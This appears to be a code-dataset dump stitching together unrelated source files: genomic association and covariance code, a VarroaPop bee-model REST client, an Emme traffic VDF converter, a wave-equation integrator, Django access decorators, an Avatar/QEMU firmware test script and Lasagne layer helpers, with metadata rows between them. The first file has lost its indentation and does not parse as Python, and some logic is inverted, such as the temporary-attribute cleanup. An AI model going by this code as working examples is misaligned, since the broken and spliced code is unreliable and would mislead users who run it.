causalSNPs = set(causalSNPs)
csnpPvals = df[df['SNP'].isin(causalSNPs)]["PValue"]
pvalPoints = np.logspace(-6, -2, num=1000)
power = [np.mean(csnpPvals < p ) for p in list(pvalPoints)]
pylab.plot(-np.log10(pvalPoints), power)
pylab.xlabel("-log10(Significance Threshold)")
pylab.ylabel("Power")
pylab.title(title)
def computeCovar(bed, shrinkMethod, fitIndividuals):
eigen = dict([])
if (shrinkMethod in ['lw', 'oas', 'l1', 'cv']):
		import sklearn.covariance as cov
		import sklearn.grid_search
t0 = time.time()
print('Estimating shrunk covariance using', shrinkMethod, 'estimator...')
if (shrinkMethod == 'lw'): covEstimator = cov.LedoitWolf(assume_centered=True, block_size = 5*bed.val.shape[0])
elif (shrinkMethod == 'oas'): covEstimator = cov.OAS(assume_centered=True)
elif (shrinkMethod == 'l1'): covEstimator = cov.GraphLassoCV(assume_centered=True, verbose=True)
elif (shrinkMethod == 'cv'):
shrunkEstimator = cov.ShrunkCovariance(assume_centered=True)
param_grid = {'shrinkage': [0.01, 0.1, 0.3, 0.5, 0.7, 0.9, 0.99]}
covEstimator = sklearn.grid_search.GridSearchCV(shrunkEstimator, param_grid)
else: raise Exception('unknown covariance regularizer')
covEstimator.fit(bed.val[fitIndividuals, :].T)
if (shrinkMethod == 'l1'):
alpha = covEstimator.alpha_
print('l1 alpha chosen:', alpha)
covEstimator2 = cov.GraphLasso(alpha=alpha, assume_centered=True, verbose=True)
else:
			if (shrinkMethod == 'cv'): shrinkEstimator = covEstimator.best_params_['shrinkage']
else: shrinkEstimator = covEstimator.shrinkage_
print('shrinkage estimator:', shrinkEstimator)
covEstimator2 = cov.ShrunkCovariance(shrinkage=shrinkEstimator, assume_centered=True)
covEstimator2.fit(bed.val.T)
XXT = covEstimator2.covariance_ * bed.val.shape[1]
print('Done in %0.2f'%(time.time()-t0), 'seconds')
else:
print('Computing kinship matrix...')
t0 = time.time()
XXT = symmetrize(blas.dsyrk(1.0, bed.val, lower=1))
print('Done in %0.2f'%(time.time()-t0), 'seconds')
try: shrinkParam = float(shrinkMethod)
except: shrinkParam = -1
if (shrinkMethod == 'mylw'):
XXT_fit = XXT[np.ix_(fitIndividuals, fitIndividuals)]
sE2R = (np.sum(XXT_fit**2) - np.sum(np.diag(XXT_fit)**2)) / (bed.val.shape[1]**2)
#temp = (bed.val**2).dot((bed.val.T)**2)
temp = symmetrize(blas.dsyrk(1.0, bed.val[fitIndividuals, :]**2, lower=1))
sER2 = (temp.sum() - np.diag(temp).sum()) / bed.val.shape[1]
shrinkParam = (sER2 - sE2R) / (sE2R * (bed.val.shape[1]-1))
if (shrinkParam > 0):
print('shrinkage estimator:', 1-shrinkParam)
XXT = (1-shrinkParam)*XXT + bed.val.shape[1]*shrinkParam*np.eye(XXT.shape[0])
return XXT
def standardize(X, method, optionsDict):
fitIndividuals = np.ones(X.shape[0], dtype=np.bool)
if (method == 'frq'):
empMean = X.mean(axis=0) / 2.0
X[:, empMean>0.5] = 2 - X[:, empMean>0.5]
print('regularizng SNPs according to frq file...')
frqFile = (optionsDict['bfilesim']+'.frq' if (optionsDict['frq'] is None) else optionsDict['frq'])
mafs = np.loadtxt(frqFile, usecols=[1,2]).mean(axis=1)
snpsMean = 2*mafs
snpsStd = np.sqrt(2*mafs*(1-mafs))
elif (method == 'related'):
if (optionsDict['related'] is None): raise Exception('related file not supplied')
print('regularizng SNPs according to non-related individuals...')
relLines = np.loadtxt(optionsDict['related'], usecols=[2])
keepArr = (relLines != 1)
print('Excluding', np.sum(~keepArr), 'from the covariance matrix standardization')
snpsMean = X[keepArr, :].mean(axis=0)
snpsStd = X[keepArr, :].std(axis=0)
fitIndividuals = keepArr
elif (method == 'controls'):
phe = optionsDict['pheno']
pheThreshold = phe.mean()
controls = (phe<pheThreshold)
print('regularizng SNPs according to controls...')
snpsMean = X[controls, :].mean(axis=0)
snpsStd = X[controls, :].std(axis=0)
fitIndividuals = controls
elif (method is None):
snpsMean = X.mean(axis=0)
snpsStd = X.std(axis=0)
else:
raise Exception('unknown SNP standardization option: ' + method)
	X -= snpsMean
X /= snpsStd
return X, fitIndividuals
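# --- Usage sketch (illustrative only; 'mydata' and 'mydata.phe' are
# placeholder file names, not files shipped with this module) ---
# Typical flow with the helpers above: load a plink bfile together with a
# phenotype file, then run the simple per-SNP association test.
if __name__ == '__main__':
    bed, pheno = loadData('mydata', None, 'mydata.phe', loadSNPs=True)
    results = linreg(bed, pheno)
    print(results.head(10))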
| apache-2.0 | 3,903,449,392,061,788,700 | 32.530488 | 122 | 0.68367 | false |
puruckertom/ubertool | ubertool/varroapop/varroapop_functions.py | 1 | 11627 | from __future__ import division #brings in Python 3.0 mixed type calculation rules
import logging
import json
import requests
import math
import pandas as pd
import os
rest_url_varroapop = os.environ.get('OPENCPU_REST_SERVER')
#rest_url_varroapop = 'http://localhost'
if not os.environ.get('OPENCPU_REST_SERVER'):
rest_url_varroapop = 'http://172.20.100.18:5656'
class VarroapopFunctions(object):
"""
Function class for Stir.
"""
def __init__(self):
"""Class representing the functions for VarroaPop"""
super(VarroapopFunctions, self).__init__()
def call_varroapop_api(self):
logging.info("=========== formatting Varroapop JSON payload")
input_json = self.format_varroapop_payload()
logging.info("=========== calling Varroapop windows REST API")
called_endpoint = (rest_url_varroapop + '/ocpu/apps/quanted/VarroaPopWrapper/R/RunVarroaPop/json')
logging.info(called_endpoint)
http_headers = {'Content-Type': 'application/json'}
logging.info("JSON payload:")
print(input_json)
return requests.post(called_endpoint, headers=http_headers, data=input_json, timeout=60)
def fill_model_out_attr(self, output_json):
outputs = json.loads(json.loads(output_json)[0])
self.out_date = self.out_date.append(pd.Series(outputs.get('Date')))
self.out_colony_size = self.out_colony_size.append(pd.Series(outputs.get('Colony.Size')))
self.out_adult_drones = self.out_adult_drones.append(pd.Series(outputs.get('Adult.Drones')))
self.out_adult_workers = self.out_adult_workers.append(pd.Series(outputs.get('Adult.Workers')))
self.out_foragers = self.out_foragers.append(pd.Series(outputs.get('Foragers')))
self.out_capped_drone_brood = self.out_capped_drone_brood.append(pd.Series(outputs.get('Capped.Drone.Brood')))
self.out_capped_worker_brood = self.out_capped_worker_brood.append(pd.Series(outputs.get('Capped.Worker.Brood')))
self.out_drone_larvae = self.out_drone_larvae.append(pd.Series(outputs.get('Drone.Larvae')))
self.out_worker_larvae =self.out_worker_larvae.append(pd.Series(outputs.get('Worker.Larvae')))
self.out_drone_eggs = self.out_drone_eggs.append(pd.Series(outputs.get('Drone.Eggs')))
self.out_worker_eggs = self.out_worker_eggs.append(pd.Series(outputs.get('Worker.Eggs')))
self.out_free_mites = self.out_free_mites.append(pd.Series(outputs.get('Free.Mites')))
self.out_drone_brood_mites =self.out_drone_brood_mites.append(pd.Series(outputs.get('Drone.Brood.Mites')))
self.out_worker_brood_mites =self.out_worker_brood_mites.append(pd.Series(outputs.get('Worker.Brood.Mites')))
self.out_drone_mites_per_cell = self.out_drone_mites_per_cell.append(pd.Series(outputs.get('Mites.Drone.Cell')))
self.out_worker_mites_per_cell = self.out_worker_mites_per_cell.append(pd.Series(outputs.get('Mites.Worker.Cell')))
self.out_mites_dying = self.out_mites_dying.append(pd.Series(outputs.get('Mites.Dying')))
self.out_proportion_mites_dying =self.out_proportion_mites_dying.append(pd.Series(outputs.get('Proportion.Mites.Dying')))
self.out_colony_pollen = self.out_colony_pollen.append(pd.Series(outputs.get('Colony.Pollen..g.')))
self.out_chemical_conc_pollen =self.out_chemical_conc_pollen.append(pd.Series(outputs.get('Pollen.Pesticide.Concentration')))
self.out_colony_nectar = self.out_colony_nectar.append(pd.Series(outputs.get('Colony.Nectar')))
self.out_chemical_conc_nectar =self.out_chemical_conc_nectar.append(pd.Series(outputs.get('Nectar.Pesticide.Concentration')))
self.out_dead_drone_larvae = self.out_dead_drone_larvae.append(pd.Series(outputs.get('Dead.Drone.Larvae')))
self.out_dead_worker_larvae =self.out_dead_worker_larvae.append(pd.Series(outputs.get('Dead.Worker.Larvae')))
self.out_dead_drone_adults = self.out_dead_drone_adults.append(pd.Series(outputs.get('Dead.Drone.Adults')))
self.out_dead_worker_adults = self.out_dead_worker_adults.append(pd.Series(outputs.get('Dead.Worker.Adults')))
self.out_dead_foragers = self.out_dead_foragers.append(pd.Series(outputs.get('Dead.Foragers')))
self.out_queen_strength = self.out_queen_strength.append(pd.Series(outputs.get('Queen.Strength')))
self.out_average_temp_c = self.out_average_temp_c.append(pd.Series(outputs.get('Average.Temperature..celsius.')))
self.out_rain_inch = self.out_rain_inch.append(pd.Series(outputs.get('Rain')))
def fill_summary_stats(self):
self.out_mean_colony_size = self.out_mean_colony_size.append(pd.Series(self.out_colony_size.mean()))
self.out_max_colony_size = self.out_max_colony_size.append(pd.Series(self.out_colony_size.max()))
self.out_min_colony_size = self.out_min_colony_size.append(pd.Series(self.out_colony_size.min()))
self.out_total_bee_mortality = self.out_total_bee_mortality.append(pd.Series(sum([self.out_dead_drone_adults.sum(),
self.out_dead_drone_larvae.sum(),
self.out_dead_worker_adults.sum(),
self.out_dead_worker_larvae.sum(),
self.out_dead_foragers.sum()])))
self.out_max_chemical_conc_pollen = self.out_max_chemical_conc_pollen.append(pd.Series(self.out_chemical_conc_pollen.max()))
self.out_max_chemical_conc_nectar = self.out_max_chemical_conc_nectar.append(pd.Series(self.out_chemical_conc_nectar.max()))
def fill_sessionid(self, sessionid):
self.out_api_sessionid = self.out_api_sessionid.append(pd.Series(sessionid))
def format_varroapop_payload(self):
input_dict = self.pd_obj.to_dict('records')[0]
weather_loc = input_dict.pop('weather_location')
print('Weather location: '+ weather_loc )
input_dict = self.collapse_dates(input_dict)
input_dict = self.rename_inputs(input_dict)
input_dict = self.remove_unused_inputs(input_dict)
data = json.dumps({'parameters':input_dict, 'weather_file':weather_loc})
return data
def collapse_dates(self, input_dict):
sim_start_keys = ['SimStart_month', 'SimStart_day', 'SimStart_year']
input_dict['SimStart'] = "/".join([str(int(input_dict.get(key))) for key in sim_start_keys])
sim_end_keys = ['SimEnd_month', 'SimEnd_day', 'SimEnd_year']
input_dict['SimEnd'] = "/".join([str(int(input_dict.get(key))) for key in sim_end_keys])
requeen_date_keys = ['RQReQueenDate_month', 'RQReQueenDate_day', 'RQReQueenDate_year']
input_dict['RQReQueenDate'] = "/".join([str(int(input_dict.get(key))) for key in requeen_date_keys])
imm_start_keys = ['ImmStart_month', 'ImmStart_day', 'ImmStart_year']
input_dict['ImmStart'] = "/".join([str(int(input_dict.get(key))) for key in imm_start_keys])
imm_end_keys = ['ImmEnd_month', 'ImmEnd_day', 'ImmEnd_year']
input_dict['ImmEnd'] = "/".join([str(int(input_dict.get(key))) for key in imm_end_keys])
vt_treatment_start_keys = ['VTTreatmentStart_month', 'VTTreatmentStart_day', 'VTTreatmentStart_year']
input_dict['VTTreatmentStart'] = "/".join([str(int(input_dict.get(key))) for key in vt_treatment_start_keys])
foliar_app_date_keys = ['FoliarAppDate_month', 'FoliarAppDate_day', 'FoliarAppDate_year']
input_dict['FoliarAppDate'] = "/".join([str(int(input_dict.get(key))) for key in foliar_app_date_keys])
foliar_forage_begin_keys = ['FoliarForageBegin_month', 'FoliarForageBegin_day', 'FoliarForageBegin_year']
input_dict['FoliarForageBegin'] = "/".join([str(int(input_dict.get(key))) for key in foliar_forage_begin_keys])
foliar_forage_end_keys = ['FoliarForageEnd_month', 'FoliarForageEnd_day', 'FoliarForageEnd_year']
input_dict['FoliarForageEnd'] = "/".join([str(int(input_dict.get(key))) for key in foliar_forage_end_keys])
soil_forage_begin_keys = ['SoilForageBegin_month', 'SoilForageBegin_day', 'SoilForageBegin_year']
input_dict['SoilForageBegin'] = "/".join([str(int(input_dict.get(key))) for key in soil_forage_begin_keys])
soil_forage_end_keys = ['SoilForageEnd_month', 'SoilForageEnd_day', 'SoilForageEnd_year']
input_dict['SoilForageEnd'] = "/".join([str(int(input_dict.get(key))) for key in soil_forage_end_keys])
seed_forage_begin_keys = ['SeedForageBegin_month', 'SeedForageBegin_day', 'SeedForageBegin_year']
input_dict['SeedForageBegin'] = "/".join([str(int(input_dict.get(key))) for key in seed_forage_begin_keys])
seed_forage_end_keys = ['SeedForageEnd_month', 'SeedForageEnd_day', 'SeedForageEnd_year']
input_dict['SeedForageEnd'] = "/".join([str(int(input_dict.get(key))) for key in seed_forage_end_keys])
sup_pollen_begin_keys = ['SupPollenBegin_month', 'SupPollenBegin_day', 'SupPollenBegin_year']
input_dict['SupPollenBegin'] = "/".join([str(int(input_dict.get(key))) for key in sup_pollen_begin_keys])
sup_pollen_end_keys = ['SupPollenEnd_month', 'SupPollenEnd_day', 'SupPollenEnd_year']
input_dict['SupPollenEnd'] = "/".join([str(int(input_dict.get(key))) for key in sup_pollen_end_keys])
sup_nectar_begin_keys = ['SupNectarBegin_month', 'SupNectarBegin_day', 'SupNectarBegin_year']
input_dict['SupNectarBegin'] = "/".join([str(int(input_dict.get(key))) for key in sup_nectar_begin_keys])
sup_nectar_end_keys = ['SupNectarEnd_month', 'SupNectarEnd_day', 'SupNectarEnd_year']
input_dict['SupNectarEnd'] = "/".join([str(int(input_dict.get(key))) for key in sup_nectar_end_keys])
inputs_to_remove = sum([sim_start_keys,sim_end_keys,requeen_date_keys,imm_start_keys,
imm_end_keys,vt_treatment_start_keys,foliar_app_date_keys,
foliar_forage_begin_keys, foliar_forage_end_keys,soil_forage_begin_keys,
soil_forage_end_keys, seed_forage_begin_keys, seed_forage_end_keys,
sup_pollen_begin_keys, sup_pollen_end_keys, sup_nectar_begin_keys, sup_nectar_end_keys], [])
[input_dict.pop(k, None) for k in inputs_to_remove]
return input_dict
def rename_inputs(self, input_dict):
input_dict['EAppRate'] = input_dict.pop('ar_lb')
input_dict['AIKOW'] = math.exp(input_dict.pop('l_kow'))
input_dict['AIKOC'] = input_dict.pop('k_oc')
return input_dict
def remove_unused_inputs(self, input_dict):
keys = list(input_dict.keys())
to_remove = [i for i in keys if i[0].islower()]
for k in to_remove:
input_dict.pop(k, None)
return input_dict
def get_input_file(self, api_sessionid):
file_endpoint = (rest_url_varroapop + '/ocpu/tmp/' + api_sessionid + '/files/')
return requests.get(file_endpoint+'vp_input.txt')
def get_log_file(self, api_sessionid):
file_endpoint = (rest_url_varroapop + '/ocpu/tmp/' + api_sessionid + '/files/')
return requests.get(file_endpoint+'vp_log.txt')
def get_results_file(self, api_sessionid):
file_endpoint = (rest_url_varroapop + '/ocpu/tmp/' + api_sessionid + '/files/')
return requests.get(file_endpoint+'vp_results.txt')
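# --- Usage sketch (illustrative only; the chemical property values below are
# made-up placeholders) ---
# rename_inputs() is the piece that maps the model's raw input names onto the
# parameter names the VarroaPop wrapper expects; it can be exercised on a
# small hand-built dict without touching the OpenCPU REST API.
if __name__ == '__main__':
    funcs = VarroapopFunctions()
    raw = {'ar_lb': 0.5, 'l_kow': 2.3, 'k_oc': 120.0}
    # ar_lb -> EAppRate, l_kow -> AIKOW (= exp(l_kow)), k_oc -> AIKOC
    print(funcs.rename_inputs(raw))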
| unlicense | -3,814,458,858,010,616,000 | 65.821839 | 133 | 0.649609 | false |
TravelModellingGroup/TMGToolbox | TMGToolbox/src/network_editing/NCS11/conversion/convert_VDFs.py | 1 | 8469 | '''
Copyright 2014 Travel Modelling Group, Department of Civil Engineering, University of Toronto
This file is part of the TMG Toolbox.
The TMG Toolbox is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
The TMG Toolbox is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with the TMG Toolbox. If not, see <http://www.gnu.org/licenses/>.
'''
#---METADATA---------------------
'''
Convert VDFs
Authors: Michael Hain
Latest revision by: Peter Kucirek
Converts VDF indices from DMG2001 to NCS11
'''
#---VERSION HISTORY
'''
0.1.0 Created by Michael Hain
0.2.0 Updated by Peter Kucirek
'''
import inro.modeller as _m
import traceback as _traceback
from contextlib import contextmanager
from contextlib import nested
_util = _m.Modeller().module('tmg.common.utilities')
_tmgTPB = _m.Modeller().module('tmg.common.TMG_tool_page_builder')
##########################################################################################################
class ConvertVDFs(_m.Tool()):
version = '0.2.0'
tool_run_msg = ""
#---Special instance types
scenario = _m.Attribute(_m.InstanceType) #
makeChangesPermanent = _m.Attribute(bool) #
def __init__(self):
self.networkCalculator = _m.Modeller().tool("inro.emme.network_calculation.network_calculator")
def page(self):
pb = _m.ToolPageBuilder(self, title="Convert VDFs v%s" %self.version,
description="Converts link classification types (stored as VDF ids) from \
DMG2001 to NCS11.",
branding_text="- TMG Toolbox")
if self.tool_run_msg != "": # to display messages in the page
pb.tool_run_status(self.tool_run_msg_status)
pb.add_select_scenario(tool_attribute_name="scenario",
title="Select a scenario",
allow_none=False)
pb.add_checkbox(tool_attribute_name="makeChangesPermanent",
title="Make changes permanent?",
note="If unchecked, new VDF values will be stored in link extra attribute '@vdf'.")
return pb.render()
##########################################################################################################
def run(self):
self.tool_run_msg = ""
if self.makeChangesPermanent is None: # Fix the checkbox problem
self.makeChangesPermanent = False;
try:
self._execute()
except Exception as e:
self.tool_run_msg = _m.PageBuilder.format_exception(
e, _traceback.format_exc())
raise
self.tool_run_msg = _m.PageBuilder.format_info("Tool complete.")
##########################################################################################################
def _execute(self):
with _m.logbook_trace(name="Convert Link VDFs v%s" %self.version,
attributes=self._getAtts()):
with self._vdfAttributeMANAGER() as self.attr:
with _m.logbook_trace("Calculating new VDFs into attribute %s" %self.attr.id):
self._assignVDFToLinkSubSet(11, "vdf=11,12") # Urban freeways
self._assignVDFToLinkSubSet(12, "vdf=13,14") # Freeways
self._assignVDFToLinkSubSet(13, "vdf=21,24") # Freeway ramps
self._assignVDFToLinkSubSet(14, "vdf=15") # Tolled freeways
self._assignVDFToLinkSubSet(15, "vdf=25") # Tolled freeway ramps
self._assignVDFToLinkSubSet(16, "vdf=99 and not length=0 and ul2=100,9999") # Freeways HOV lanes
self._assignVDFToLinkSubSet(17, "vdf=99 and length=0,0.1 and ul2=100,9999") # Freeway HOV ramps
self._assignVDFToLinkSubSet(20, "vdf=30,39 and lanes=1 and ul3=600,9999") # Two-lane rural roads
self._assignVDFToLinkSubSet(21, "vdf=30,39 and lanes=2,99 and ul3=600,9999") # Multi-lane rural roads
self._assignVDFToLinkSubSet(22, "vdf=30,39 and ul3=0,599")
self._assignVDFToLinkSubSet(22, "type=217,219 or type=224 or type=325 or type=537 or type=700,999 and vdf=40,49")
self._assignVDFToLinkSubSet(22, "type=217,219 or type=224 or type=325 or type=537 or type=700,999 and vdf=60,69")
self._assignVDFToLinkSubSet(30, "vdf=40,49 and %s=0" %self.attr.id) # Assign only to links which have not already been assigned.
self._assignVDFToLinkSubSet(30, "vdf=30,39 and type=0,112")
self._assignVDFToLinkSubSet(40, "vdf=50,59 and ul3=700,9999")
self._assignVDFToLinkSubSet(41, "vdf=99 and ul2=0,99")
self._assignVDFToLinkSubSet(42, "vdf=50,59 and ul3=0,699")
self._assignVDFToLinkSubSet(50, "vdf=60,69 and %s=0 and lanes=2,99 and ul3=401,9999" %self.attr.id)
self._assignVDFToLinkSubSet(51, "lanes=1 or ul3=0,400 and vdf=60,69 and %s=0" %self.attr.id)
self._assignVDFToLinkSubSet(51, "type=538 and vdf=64")
self._assignVDFToLinkSubSet(90, "vdf=90") #Centroid connectors
if self.makeChangesPermanent:
with _m.logbook_trace("Copying new VDF values into network"):
self._copyAttributeToVDF()
##########################################################################################################
#----CONTEXT MANAGERS---------------------------------------------------------------------------------
'''
Context managers for temporary database modifications.
'''
@contextmanager
def _vdfAttributeMANAGER(self):
#Code here is executed upon entry
att = None
att = self.scenario.extra_attribute("@vdf")
if att is None:
att = self.scenario.create_extra_attribute('LINK', '@vdf', default_value=0)
_m.logbook_write("Created temporary link '%s' attribute to store new VDFs." %att.id)
else:
att.initialize()
_m.logbook_write("Initialized attribute '%s'." %att.id)
try:
yield att
finally:
# Code here is executed in all cases.
if self.makeChangesPermanent:
i = att.id
self.scenario.delete_extra_attribute(att)
_m.logbook_write("Deleted temporary link attribute '%s'" %i)
else:
_m.logbook_write("Temporary link attribute '%s' made permanent." %att.id)
#----SUB FUNCTIONS---------------------------------------------------------------------------------
def _getAtts(self):
atts = {
"Scenario" : str(self.scenario.id),
"self": self.__MODELLER_NAMESPACE__}
return atts
def _assignVDFToLinkSubSet(self, vdf, filterExpression):
spec = {
"result": self.attr.id,
"expression": str(vdf),
"selections": {"link": filterExpression},
"type": "NETWORK_CALCULATION"
}
self.networkCalculator(spec, scenario=self.scenario)
def _copyAttributeToVDF(self):
spec = {
"result": "vdf",
"expression": self.attr.id,
"selections": {"link": "all"},
"type": "NETWORK_CALCULATION"
}
self.networkCalculator(spec, scenario=self.scenario)
@_m.method(return_type=unicode)
def tool_run_msg_status(self):
return self.tool_run_msg
| gpl-3.0 | -17,125,685,268,828,372 | 41.139303 | 148 | 0.526036 | false |
ioreshnikov/wells | wells/time_dependent.py | 1 | 1615 | import scipy as s
import scipy.fftpack as fft
import scipy.integrate
import sys
def integrate(t, x, input, potential, delta, pump, loss, absorber):
nt = len(t)
nx = len(x)
dx = x[1] - x[0]
k = 2*s.pi * fft.fftfreq(nx, dx)
d = - delta - 1/2 * k**2
spectrum = fft.fft(input)
spectrum_ = spectrum
def rhs(t, spectrum_):
exp_ = s.exp(1j * d * t)
spectrum = exp_ * spectrum_
state = fft.ifft(spectrum)
nonlinearity = abs(state)**2 * state
nonlinearity += - potential * state
nonlinearity += 1j * loss * state
nonlinearity += 1j * absorber * (abs(state) - abs(input)) * state
nonlinearity += pump
return 1j * 1/exp_ * fft.fft(nonlinearity)
solver = scipy.integrate.ode(rhs)
solver.set_integrator("zvode",
rtol=1E-6,
atol=1E-10,
nsteps=2048)
solver.set_initial_value(spectrum_, 0)
spectra_ = s.zeros((nt, nx), dtype=complex)
spectra_[0, :] = spectrum_
# Preallocate return matrices in advance.
spectra = s.zeros((nt, nx), dtype=complex)
states = s.zeros((nt, nx), dtype=complex)
for i in range(1, nt):
sys.stderr.write("\rIntegrating: %-3.3f%%" % (100 * i/nt))
spectra_[i, :] = solver.integrate(t[i])
sys.stderr.write("\r")
for i in range(0, nt):
spectra[i, :] = s.exp(1j * d * t[i]) * spectra_[i, :]
states[i, :] = fft.ifft(spectra[i, :])
spectra[i, :] = 1/nt * fft.fftshift(spectra[i, :])
k = fft.fftshift(k)
return k, states, spectra
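# --- Usage sketch (illustrative parameters only, not taken from any study) ---
# Shows the argument shapes integrate() expects: a time grid, a space grid,
# an initial field, a potential, and pump/loss/absorber terms (zero here).
if __name__ == '__main__':
    t = s.linspace(0.0, 1.0, 2**7)
    x = s.linspace(-16.0, 16.0, 2**9)
    input_field = 0.1 * s.exp(-x**2)
    potential = 0.5 * x**2
    pump = s.zeros(len(x))
    absorber = s.zeros(len(x))
    k, states, spectra = integrate(
        t, x, input_field, potential,
        delta=0.0, pump=pump, loss=0.0, absorber=absorber)
    print(abs(states[-1, :]).max())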
| mit | 2,178,837,503,368,915,500 | 28.907407 | 73 | 0.544892 | false |
HenriqueLR/payments | app/main/decorators.py | 1 | 1514 | #encoding: utf-8
from django.core.exceptions import PermissionDenied
from django.contrib import messages
from django.shortcuts import redirect
from django.contrib.auth import get_user_model
from wallet.models import Debit, Deposit, Note
from main.utils import get_list_permissions
User = get_user_model()
def ajax_required(view):
def wrap(request, *args, **kwargs):
if not request.is_ajax():
			messages.error(request, 'Unable to access this link; please contact the system administrator')
return redirect('accounts:logout')
return view(request, *args, **kwargs)
wrap.__doc__ = view.__doc__
wrap.__name__ = view.__name__
return wrap
def permissions_denied(view):
def wrap(request, *args, **kwargs):
list_model = [Debit, Deposit, Note]
for model in list_model:
permissions = get_list_permissions(model, permission_list=['all'])
if not request.user.has_perms(permissions):
				messages.error(request, 'You do not have the required permissions; contact the system administrator')
return redirect('accounts:logout')
return view(request, *args, **kwargs)
wrap.__doc__ = view.__doc__
wrap.__name__ = view.__name__
return wrap
def verify_payment(view):
def wrap(request, *args, **kwargs):
if not request.user.account.status_payment:
			messages.error(request, 'We are awaiting payment before the system can be unlocked')
return redirect('accounts:logout')
return view(request, *args, **kwargs)
wrap.__doc__ = view.__doc__
wrap.__name__ = view.__name__
return wrap | mit | 5,929,164,697,228,002,000 | 31.12766 | 103 | 0.721007 | false |
jmatthed/avatar-samples | qemu_uboot/test_system.py | 1 | 4490 | from avatar.system import System
import logging
from avatar.emulators.s2e import init_s2e_emulator
import threading
import subprocess
from avatar.targets.gdbserver_target import init_gdbserver_target
import os
import time
log = logging.getLogger(__name__)
configuration = {
"output_directory": "/tmp/1",
"configuration_directory": os.getcwd(),
"s2e": {
"klee": {
},
"plugins": {
"BaseInstructions": {},
"Initializer": {},
"MemoryInterceptor": "",
"RemoteMemory": {
"verbose": True,
"listen_address": "localhost:3333",
"ranges": {
"sram_code": {
"address": 32768,
"size": 1048575,
"access": ["read", "write", "execute", "io", "memory", "concrete_value", "concrete_address"]
}
}
},
}
},
"qemu_configuration": {
"halt_processor_on_startup": True,
"trace_instructions": True,
"trace_microops": False,
"gdb": "tcp::1235,server,nowait",
"append": ["-serial", "tcp::8888,server,nowait"]
},
"machine_configuration": {
"architecture": "arm",
"cpu_model": "arm926",
"entry_address": 0x1000000,
"memory_map": [
{
"size": 0x1000,
"name": "interrupts",
"map": [
{"address": 0,
"type": "code",
"permissions": "rwx"}
]
},
{
"size": 0x19000,
"name": "text_data_bss",
"file": "u-boot.bin",
"map": [{
"address": 0x1000000,
"type": "code",
"permissions": "rwx"}]
}
],
"devices": [
{
"type": "serial",
"name": "uart16550",
"qemu_name": "sysbus-serial",
"address": 0x101f1000,
"bus": "sysbus"
}
]
},
"avatar_configuration": {
"target_gdb_address": "tcp:localhost:1234"
}
}
class TargetLauncher(object):
def __init__(self, cmd):
self._cmd = cmd
self._process = None
self._thread = threading.Thread(target = self.run)
self._thread.start()
def stop(self):
if self._process:
self._process.kill()
def run(self):
        # Popen (rather than call) so that stop() can kill the process; wait()
        # keeps the original blocking behaviour of the launcher thread.
        self._process = subprocess.Popen(self._cmd)
        self._process.wait()
class DumbTarget():
def start(self):
pass
def init_emulator(system):
log.info("init_emulator called")
def init_target(system):
system.set_target(DumbTarget())
log.info("init_target called")
class RWMonitor():
def emulator_pre_read_request(self, params):
log.info("Emulator is requesting read 0x%08x[%d]", params["address"], params["size"])
def emulator_post_read_request(self, params):
log.info("Executed read 0x%08x[%d] = 0x%x", params["address"], params["size"], params["value"])
def emulator_pre_write_request(self, params):
log.info("Emulator is requesting write 0x%08x[%d] = 0x%x", params["address"], params["size"], params["value"])
pass
def emulator_post_write_request(self, params):
log.info("Executed write 0x%08x[%d] = 0x%x", params["address"], params["size"], params["value"])
pass
def stop(self):
pass
ava = System(configuration, init_s2e_emulator, init_gdbserver_target)
ava.init()
target_runner = TargetLauncher(["qemu-system-arm",
"-M", "versatilepb",
"-m", "20M",
"-serial", "udp:127.0.0.1:2000",
"-kernel", "u-boot",
"-gdb", "tcp:127.0.0.1:1234",
"-S"])
ava.add_monitor(RWMonitor())
time.sleep(3)
ava.start()
ava.get_emulator().cont()
| apache-2.0 | 1,403,994,548,638,476,000 | 31.071429 | 118 | 0.436526 | false |
maxim-borisyak/craynn | craynn/layers/conv_ops.py | 1 | 2783 | from lasagne import *
__all__ = [
'conv', 'conv1x1',
'deconv', 'deconv1x1',
'upscale',
'max_pool', 'mean_pool', 'floating_maxpool', 'floating_meanpool',
'global_pool',
'upconv', 'downconv'
]
get_conv_nonlinearity = lambda f=None: nonlinearities.LeakyRectify(0.05) if f is None else f
get_companion_nonlinearity = lambda num_units=None, f=None: \
nonlinearities.sigmoid if num_units is None or num_units == 1 else nonlinearities.softmax
conv = lambda num_filters, f=None, filter_size=(3, 3): lambda incoming: layers.Conv2DLayer(
incoming,
num_filters=num_filters, filter_size=filter_size,
nonlinearity=get_conv_nonlinearity(f),
pad='valid'
)
conv1x1 = lambda num_filters, f=None: lambda incoming: layers.Conv2DLayer(
incoming,
num_filters=num_filters, filter_size=(1, 1),
nonlinearity=get_conv_nonlinearity(f),
pad='valid'
)
deconv = lambda num_filters, f=None, filter_size=(3, 3): lambda incoming: layers.TransposedConv2DLayer(
incoming,
num_filters=num_filters, filter_size=filter_size,
nonlinearity=get_conv_nonlinearity(f),
crop='valid'
)
deconv1x1 = lambda num_filters, f=None: lambda incoming: layers.TransposedConv2DLayer(
incoming,
num_filters=num_filters, filter_size=(1, 1),
nonlinearity=get_conv_nonlinearity(f),
crop='valid'
)
max_pool = lambda pool_size=(2, 2): lambda incoming: layers.MaxPool2DLayer(incoming, pool_size=pool_size)
floating_maxpool = lambda pool_size=(2, 2): lambda incoming: layers.MaxPool2DLayer(
incoming,
pool_size=(pool_size[0] // 2 * 3, pool_size[0] // 2 * 3),
stride=pool_size,
pad=(pool_size[0] // 2, pool_size[1] // 2)
)
upscale = lambda scale_factor=(2, 2): lambda incoming: layers.Upscale2DLayer(incoming, scale_factor=scale_factor)
downconv = lambda scale_factor=(2, 2), channel_factor=1: lambda incoming: \
layers.Conv2DLayer(
incoming,
num_filters=layers.get_output_shape(incoming)[1] // channel_factor,
filter_size=scale_factor,
stride=scale_factor,
nonlinearity=nonlinearities.linear
)
upconv = lambda scale_factor=(2, 2), channel_factor=1: lambda incoming: \
layers.TransposedConv2DLayer(
incoming,
num_filters=layers.get_output_shape(incoming)[1] // channel_factor,
filter_size=scale_factor,
stride=scale_factor,
nonlinearity=nonlinearities.linear
)
